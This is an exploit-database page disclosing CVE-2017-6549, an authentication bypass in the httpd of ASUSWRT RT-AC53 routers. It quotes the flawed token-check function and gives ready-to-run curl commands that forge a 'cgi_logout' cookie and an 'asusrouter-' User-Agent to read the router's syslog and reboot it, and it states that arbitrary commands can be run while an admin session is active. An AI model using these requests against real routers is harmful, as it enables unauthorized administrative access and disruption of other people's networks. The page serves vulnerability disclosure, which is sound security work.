Skip to content
cyberexploits
webapphardwaretext

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing

ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing

Publié le 2017-03-08

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/hardware/webapps/41572.txt7eac4c3a
raw
Session Stealing



Component: httpd



CVE: CVE-2017-6549



Vulnerability:



httpd uses the function search_token_in_list to validate if a user is logged into the admin interface by checking his asus_token value. There seems to be a branch which could be a failed attempt to build in a logout functionality.



asus_token_t* search_token_in_list(char* token, asus_token_t **prev)

{

    asus_token_t *ptr = head;

    asus_token_t *tmp = NULL;

    int found = 0;

    char *cp = NULL;



    while(ptr != NULL)

    {

        if(!strncmp(token, ptr->token, 32)) {

            found = 1;

            break;

        }

        else if(strncmp(token, "cgi_logout", 10) == 0) {

            cp = strtok(ptr->useragent, "-");



            if(strcmp(cp, "asusrouter") != 0) {

                found = 1;

                break;

            }

        }

        else {

            tmp = ptr;

            ptr = ptr->next;

        }

    }

    

    if(found == 1) {

        if(prev)

            *prev = tmp;

        return ptr;

    }   

    else {

        return NULL;

    }

}

If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header he will be treated as signed-in if any other administrator session is active.



PoC:



# read syslog

curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt



#reboot router

curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'

It’s possible to execute arbitrary commands on the router if any admin session is currently active.
Voir sur GitHub